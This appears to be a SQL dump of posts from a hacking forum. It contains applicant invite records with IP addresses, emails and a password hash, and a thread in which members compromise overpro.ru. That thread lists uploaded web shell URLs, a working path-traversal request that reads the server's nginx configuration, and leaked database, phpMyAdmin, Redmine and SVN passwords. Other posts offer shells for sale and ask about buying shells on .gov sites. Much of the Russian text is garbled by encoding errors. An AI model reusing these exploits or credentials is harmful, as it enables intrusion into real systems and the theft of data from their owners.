(1840, 1614, 0, 'Invite', 2, '{$name}', 1409425953, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: Still trying to get this form to work. I am a pen tester with some bugs to sell, mostly file path traversal and some shell uploads. I take apart malware at my job. I like trading malware and finding rare samples, I have some to trade or give away.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.63.97.34\n[*][b]real ip[/b]: 178.63.97.34\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1841, 1615, 0, 'Invite', 2, '{$name}', 1409428604, '[SIZE=\'4\'][COLOR=\'Sienna\']S3D[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Hacker\n[b]e-mail[/b]: zied142@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.0.175.43\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2138.3 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s3d.cz | s3d.cz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1842, 1612, 1833, 'Psych0tr1a', 11, '', 1409430721, '[url]http://www.overpro.ru/upload/[/url]\n\n[url]http://www.overpro.ru/upload/uploads/.htaccess[/url]\n\náтрðýýþ ýþ þý ýõ рðñþтðõт\n[url]http://www.overpro.ru/upload/uploads/wso.jpeg[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.txt[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.php[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.php1[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.php2[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.phtml[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.phtm[/url]\n[url]http://www.overpro.ru/upload/uploads/wso.html[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1843, 1612, 1833, 'Psych0tr1a', 11, '', 1409430911, 'ýðшõû õщё ýõüýþóþ òÑÂÑÂúþóþ\n\nÃâ€Ã°Ã¼Ã¿\n[url]http://www.overpro.ru/dump.sql[/url]\n\n[url]http://www.overpro.ru/server-status[/url]\n\nфðùûы\n[url]http://www.overpro.ru/globals.php[/url]\n[url]http://www.overpro.ru/configuration.php[/url]\n\nÿðÿþчúø\n[url]http://www.overpro.ru/templates/[/url]\n[url]http://www.overpro.ru/editor/[/url]\n[url]http://www.overpro.ru/media/[/url]\n[url]http://www.overpro.ru/modules/[/url]\n[url]http://www.overpro.ru/files/[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1844, 1612, 1833, 'Psych0tr1a', 11, '', 1409431324, 'LOL\nÑÂúðýы ôþúуüõýтþò ðôüøýþò шúþûьýøúþò\n\n[url]http://www.overpro.ru/upload/uploads/admins.rar[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1845, 1612, 1833, 'unlog', 45, '', 1409432207, '[QUOTE=Psych0tr1a;1844]LOL\nÑÂúðýы ôþúуüõýтþò ðôüøýþò шúþûьýøúþò[/QUOTE]\n\nÑÂúðý ÿðÑÂÿþртð ÑÂтþ чðÑÂть ÿрþцõÑÂÑÂð øôõýтøфøúðцøø, тðú чтþ ÑÂтþóþ ôþñрð тðü ýðòðûþü.\n\n[QUOTE=Psych0tr1a;1842]\n_http://www.overpro.ru/upload/uploads/.htaccess\náтрðýýþ ýþ þý ýõ рðñþтðõт[/QUOTE]\n\nò nginx òрþôõ ýõт тðúþù штуúø úðú .htaccess\nàñûþú ò фðùûðх úþýфøóурðцøø:\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../usr/local/etc/nginx/include/overpro.ru.conf\n[CODE]location ~ (/uploads|/images)\n{\n rewrite ^/upload/uploads/(.*)\\.view$ /upload/view.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.download$ /upload/download.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.admin$ /upload/admin.php?file=$1 last;\n # rewrite \"^/promo(.*)/:-\\)/captcha/([0-9a-z]{10,32}).jpg$\" /promo$1/kcaptcha/index.php?PHPSESSID=$2 last;\n\n index index.html;\n location ~ \\.(php|phtml|xml)$\n {\n #access_log /home/fddos/hackers.log hacker;\n return 404;\n } \n\n location ~ \\.exe.*$\n {\n access_log /home/fddos/hackers_exe.log hacker;\n return 404;\n } \n access_log off;\n expires 1d;\n\n}[/CODE]\n\nÕщõ тðü õÑÂть:\n[CODE] location ~ \\.shtml$ { ssi on; }[/CODE]\n[B]Úтþ Ñ SSI øüõû ôõûþ üþöõтõ ÿþÿрþñþòðть? [/B]\n\n[B]PS: ÃÂõ ôõûðùтõ úûøúðñõûьýых ÑÂÑÂыûþú ÿþöðûуùÑÂтð.[/B]', 1, 0, '', 0, 1, 0, 0, 0),
(1846, 1612, 1845, 'ropertus', 33, '', 1409438283, '[QUOTE=unlog;1845]ÑÂúðý ÿðÑÂÿþртð ÑÂтþ чðÑÂть ÿрþцõÑÂÑÂð øôõýтøфøúðцøø, тðú чтþ ÑÂтþóþ ôþñрð тðü ýðòðûþü.\n\n\n\nò nginx òрþôõ ýõт тðúþù штуúø úðú .htaccess\nàñûþú ò фðùûðх úþýфøóурðцøø:\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../usr/local/etc/nginx/include/overpro.ru.conf\n[CODE]location ~ (/uploads|/images)\n{\n rewrite ^/upload/uploads/(.*)\\.view$ /upload/view.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.download$ /upload/download.php?file=$1 last;\n rewrite ^/upload/uploads/(.*)\\.admin$ /upload/admin.php?file=$1 last;\n # rewrite \"^/promo(.*)/:-\\)/captcha/([0-9a-z]{10,32}).jpg$\" /promo$1/kcaptcha/index.php?PHPSESSID=$2 last;\n\n index index.html;\n location ~ \\.(php|phtml|xml)$\n {\n #access_log /home/fddos/hackers.log hacker;\n return 404;\n } \n\n location ~ \\.exe.*$\n {\n access_log /home/fddos/hackers_exe.log hacker;\n return 404;\n } \n access_log off;\n expires 1d;\n\n}[/CODE]\n\nÕщõ тðü õÑÂть:\n[CODE] location ~ \\.shtml$ { ssi on; }[/CODE]\n[B]Úтþ Ñ SSI øüõû ôõûþ üþöõтõ ÿþÿрþñþòðть? [/B]\n\n[B]PS: ÃÂõ ôõûðùтõ úûøúðñõûьýых ÑÂÑÂыûþú ÿþöðûуùÑÂтð.[/B][/QUOTE]\n\nServer side includes is possible!\n\nHere is my code\n[PHP]\n \n[/PHP]\n\n[url]http://www.overpro.ru/upload/uploads/ssi_1409438079.shtml[/url]\n\nI can\'t seem to get #INCLUDE or #EXEC to work though..', 1, 1, '', 0, 1, 0, 0, 0),
(1848, 1616, 0, 'Psych0tr1a', 11, 'ÿøшу òÑÂõü ò ûøчúу , ÿøшу...', 1409503964, 'ÿøшу òÑÂõü ò ûøчúу , ÿøшу...\r\nø ÿþтþü òôруó ôþхþôøт чтþ ýõúтþ ýõ òøôøт чтþ øü ÿрøхþôÑÂÑ‚ ÑÂþþñщõýøÑÂ!\r\nтþòðрøщ ðôüøý òõрýø ñðр óôõ ñыûø òøôýы ÑÂþþñщõýøѠøûø ÑÂôõûðù чтþñы òыÑÂúðúøòðû ðûõрт úðú ýð ðчðтõ.', 1, 0, '', 0, 1, 0, 0, 0),
(1849, 1617, 0, 'Invite', 2, '{$name}', 1409509093, '[SIZE=\'4\'][COLOR=\'Sienna\']crypto[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: goodlife@jabbim.com\n[b]e-mail[/b]: gumusserhat@yandex.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 212.253.202.141\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Crypto : win2003@list.ru : : a259db0798e7517cdc76dcd3be480935\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1850, 1616, 1848, 'ropertus', 33, '', 1409509404, 'I agree with this, would be a nice feature.', 1, 1, '', 0, 1, 0, 0, 0),
(1851, 1612, 1833, 'unlog', 45, '', 1409512378, 'ØýфþрüðцøѠÿþ ÿþòþôу ÿрøрþôы ÑÂòûõýøѠѠþтôðчõù ñøýðрýþóþ фðùûð:\r\n[url]http://sla.ckers.org/forum/read.php?16,32409,32761[/url]\r\náúрøÿт ÿðрÑÂøýóð ýð php:\r\n[url]http://scipio-vs-carthago.blogspot.ru/2009/04/ufs.html[/url]\r\n\r\n[CODE]\r\n\r\nßðрÑÂøýó úðтðûþóþò FreeBSD þт Scipio \r\n\r\n\r\n\r\n\r\n\'1\') and ($nexthex<\'8\'))\r\n {\r\n $pob=\" \".\'[DIR] \';\r\n $nam=TRUE;\r\n $i+=4;\r\n }\r\n\r\n if (($curhex==\'080\') and ($nexthex>\'1\') and ($nexthex<\'8\'))\r\n {\r\n $pob=\" \".\'[FILE] \';\r\n $nam=TRUE;\r\n $i+=4;\r\n }\r\n if (($curhex==\'0a0\') and ($nexthex>\'1\') and ($nexthex<\'8\'))\r\n {\r\n $pob=\" \".\'[LINK] \';\r\n $nam=TRUE;\r\n $i+=4;\r\n }\r\n if ($nam===TRUE)\r\n {\r\n if (($s[$i]>\'1\') and ($s[$i]<\'8\'))\r\n {\r\n $hx=substr($s,$i,2);\r\n $hx=chr(hexdec($hx));\r\n $pob=$pob.$hx;\r\n }\r\n else {echo $pob; $nam=FALSE;}\r\n }\r\n }\r\n}\r\n?>\r\n\r\n[/CODE]\r\náтруúтурð:\r\n[url]http://scipio-vs-carthago.blogspot.ru/2009_11_01_archive.html[/url]\r\n[CODE]\r\nstruct ufs_dir_entry {\r\n __u32 d_ino; ///inode number of this entry\r\n __u16 d_reclen; ///length of this entry\r\n union {\r\n __u16 d_namlen; ///actual length of d_name\r\n struct {\r\n __u8 d_type; ///file type\r\n __u8 d_namlen; ///length of string in d_name\r\n } d_44;\r\n } d_u;\r\n __u8 d_name[UFS_MAXNAMLEN + 1]; ///file name\r\n};\r\n[/CODE]', 1, 0, '', 0, 1, 0, 0, 0),
(1852, 1618, 0, 'Invite', 2, '{$name}', 1409514764, '[SIZE=\'4\'][COLOR=\'Sienna\']Krox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@exploit.im\n[b]e-mail[/b]: Tyronehammondjohnson@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.187.145.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://krox.de | krox.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1853, 1619, 0, 'Invite', 2, '{$name}', 1409514767, '[SIZE=\'4\'][COLOR=\'Sienna\']Krox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@exploit.im\n[b]e-mail[/b]: Tyronehammondjohnson@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.187.145.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://krox.de | krox.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1854, 1620, 0, 'Invite', 2, '{$name}', 1409514868, '[SIZE=\'4\'][COLOR=\'Sienna\']Krox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@exploit.im\n[b]e-mail[/b]: Tyronehammondjohnson@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.14.208.233\n[*][b]real ip[/b]: 89.187.145.24\n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://krox.de | krox.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1855, 1621, 0, 'Invite', 2, '{$name}', 1409516154, '[SIZE=\'4\'][COLOR=\'Sienna\']Bhat[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Indentity__@outlook.com\n[b]e-mail[/b]: Chef_fehc@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\nI am familiar with PHP exploitation, skip tracing & SE\'ing to access otherwise inaccessible data. I push myself to the limits of my knowledge to do what needs to be done... I\'m a nice guy until I have a reason not to be... I\'m silent, I do what needs to be done & I get out, I don\'t stick around long enough for anyone to ask questions. \r\n\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.178.95.74\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/theashbhat | https://twitter.com/theashbhat \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1857, 1622, 0, 'kx00', 6, '� у шеллы.', 1409541960, 'úûøõýт ÿþÑÂòøÃȄÂѠýð ру шõûûы. þцõýúð ~10$/1ú трðффð. ÑÂтучøтõ ôðü úþýтðúт.\nтõüðтøúð ûюñðÑÂ. тþûьúþ трðфøÑÂтыõ. тþûьúþ хðрôúþр!', 1, 1, '', 0, 1, 0, 0, 0),
(1861, 1612, 1833, 'unlog', 45, '', 1409555634, '_ttp://task.0ver.pro = /home/redmine/public\n\n/home/redmine/public/.auth\n[CODE]redmine:GJg5csAgVZgzI[/CODE]\n\n/home/redmine/config/database.yml\n[CODE]production:\n adapter: mysql2\n database: redmine\n host: db.0ver.pro\n username: redmine\n password: \"o8YCkG5Yx2\"\n encoding: utf8\n[/CODE]\n\n_ttp://88.208.61.34:82/server-status\n\núтþ-ýøñуôь ÿрþñþòðû ø÷òýõ ú mysql úþýýõúтøтьÑÂÑÂ?', 1, 0, '', 0, 1, 0, 0, 0),
(1859, 1083, 1119, 'BigBear', 34, '', 1409549938, 'ãòøôõû. Ãâ€Ã»Ñ Ã¿Ñ€Ã¾Ã²ÃµÑ€ÃºÃ¸ - ýуöýы ôðýýыõ òþт þт ÑÂтþóþ ðúúð\n\n\n_http://www.toranoana.jp/bl/\nID:B7317705 \n\nÃâ€Ã¾ÑÂтðýь üýõ òÑÂÑ‘ чтþ üþöõшь, ÿþ цõýõ ÑÂþóûðÑÂую.', 1, 0, '', 0, 1, 0, 0, 0),
(1860, 1612, 1833, 'w0rm', 1, '', 1409550399, 'úûючøúø\n[code]\ndev.overpro.ru ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxny/6Z+Qgpp+Mqsyd1rvFgkzRQtPeRl6MgARHfmkdqm3y09V/TRMeJ0LTMto8/Al7ZwGjp+pJBm8NzI41mPsix0cafmD0TISHmFoLqaPGqohmpp6AlsM9JfyO3slotXOWc9DJXb2DckZJM3idYqpCBTeWHXq9nvn5NtoJ+xGnefptXb8kquHW/zaeO/8lrNU6yMWcjXrB30nbTIUB2tPUSjmU/DkKupsTdYCzs204WEoS+KN/mN5X/DHH4gVM6fmiNRwsvzlWgRMLd80R81Ne5uDCBWwhLG0R6XRCW8oS2x85eP+U1SbThebQWNHxNlL0F+TbWeKBR/I0NJ6b5vd0Q==\never4ever.ru ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+7qAH5IGj36MnTUBWGo9lYyq3HqiEcoHFU2zS9Bmk00OCovkeqyY7Fth1eyyjnY93CRGofeGgAdr+S1UHrJK7drOUS6ecmcbo54JxKJse9t8y+vx0FI9kbRXYsW9Yp3xgaBG9E8V0hFdIfPvckMTvEZ+PB18UaEz24FaE3qwyS04mU0gPqI8UbfsPAqTtK/tC1UbW726Ia8Y9BCsBKYLUb8IgVxa+wTp5eifox5qpcPo31i0stK0VNAU5SCQekHauiSSNe2BqnV1EDA1L1x6I9M+sKtqAWKSVeZbGJBFWBYDGfyR7Q9NNZTokOn1BtNTX5Zofrfy/bSYay/5KQc+7\npromir.tv ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuv2ioeA/X6/VFZ7OKJenjTpoec1tacNigsDo31pzMatrwklD1JTp+tQA2yrmPkvTUkLkXS2OLluJ01jUsLXgAwo1is971tHlTqXD6zF5kei0Jjby9RMMMVCmXnbZiuE2KsGdR8nd9ocATc8B5Uviw42qJL7Ds7khAnSbfjQ0Y2vF/LjF46A79ozkeL/+h8vYU87KBapy0oGWxhe1DjQQwDI3l59PGXuswpLPSEAMbfO/BvKX9AwrrJ0Kt0WiKdbjd4UzBF9GELrPXAIcZOa3Mgg6P4wGXH8/qjA56MN+j8asAMhvEDw8bSaby3izkCFGzYfq1f9W/8lrQ28plbgMkw==\n\n[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(1862, 1612, 1833, 'w0rm', 1, '', 1409556211, 'ÿþÿðôðõü ýð þôýу ø÷ ÿрþúÑÂø.', 1, 0, '', 0, 1, 0, 0, 0),
(1863, 1623, 0, 'Invite', 2, '{$name}', 1409557547, '[SIZE=\'4\'][COLOR=\'Sienna\']Amir Reza[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: aaaamirrezaaaa\n[b]e-mail[/b]: aaaamirrezaaaa@gmail.com\n[b]Info[/b]: I\'m interested in reverse engineering and malware development in Android. I have lots of unique family for Android. There are lots of cracked analysis tool for dex file like jeb or some obfuscaters.\r\n\r\nAlso I\'m good at linux systems and how they work \r\n\r\nbla bla bla lots of thing inside me :)\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 144.122.98.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/amirrezaf | https://twitter.com/amirrezaf \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1864, 1612, 1833, 'unlog', 45, '', 1409565212, 'phpmyadmin þтòðûøÃȄÂѠþт ÑÂõрòõрð (#2002 - The server is not responding). Úтþ-тþ чтþ-тþ ôõûðû?', 1, 0, '', 0, 1, 0, 0, 0),
(1865, 1612, 1833, 'w0rm', 1, '', 1409565329, '2 øÿ c ÿð Ѡþôýþóþ рðñþтðõт Ѡôруóþù ýõт.', 1, 0, '', 0, 1, 0, 0, 0),
(1866, 1622, 1857, 'Psych0tr1a', 11, '', 1409567772, 'ua ýõ ÿþùôõт?', 1, 0, '', 0, 1, 0, 0, 0),
(1867, 1624, 0, 'Psych0tr1a', 11, 'шõûûы ýð .gov', 1409567924, 'Úтþ ýøñуôь ÷ýðõт úтþ ÑÂúуÿðõт шõûûы ýð .gov ÑÂðùтðх?', 1, 0, '', 0, 1, 0, 0, 0),
(1868, 1612, 1833, 'unlog', 45, '', 1409568393, '[quote=w0rm;1865]2 øÿ c ÿð Ѡþôýþóþ рðñþтðõт Ѡôруóþù ýõт.[/quote]\nôõùÑÂтòøтõûьýþ, ýõ þñрðтøû òýøüðýøõ:)\n\nõщõ þôýð ñð÷ð þтúрытð:\n_ttp://88.208.57.184:82/phpmyadmin/\nredmine : o8YCkG5Yx2\n\nò ñð÷õ ôðýýыõ ÑÂðñòõрÑÂøø:\nsvn://dev.overpro.ru/overpro\nlogin : overpro\npassword : hk6cedvhmyjxo83hciqk\n\nу úþóþ õÑÂть ÑÂõрòõр, ÿрþòõрьтõ ÿþöðûуùÑÂтð.', 1, 0, '', 0, 1, 0, 0, 0),
(1869, 1612, 1868, 'unlog', 45, '', 1409568466, '[quote=w0rm;1865]2 øÿ c ÿð Ѡþôýþóþ рðñþтðõт Ѡôруóþù ýõт.[/quote]\r\nôõùÑÂтòøтõûьýþ, ýõ þñрðтøû òýøüðýøõ:)\r\n\r\n[quote=unlog;1868]õщõ þôýð ñð÷ð þтúрытð:\r\n[url]http://88.208.57.184:82/phpmyadmin/[/url]\r\nredmine : O8yckg5yx2\r\n\r\nò ñð÷õ ôðýýыõ ÑÂðñòõрÑÂøø:\r\nUrl svn://dev.overpro.ru/overpro\r\nlogin overpro\r\npassword hk6cedvhmyjxo83hciqk\r\n\r\nу úþóþ õÑÂть ÑÂõрòõр, ÿрþòõрьтõ ÿþöðûуùÑÂтð.[/quote]', 1, 0, '', 0, 2, 0, 0, 0),
(1870, 1612, 1833, 'w0rm', 1, '', 1409573662, 'úðú òþôøтÑÂÑ ÑÂòý = ssh\n\núøýь ðôüøýð þт Ñ€ÑÂôüðùýð.', 1, 0, '', 0, 1, 0, 0, 0),
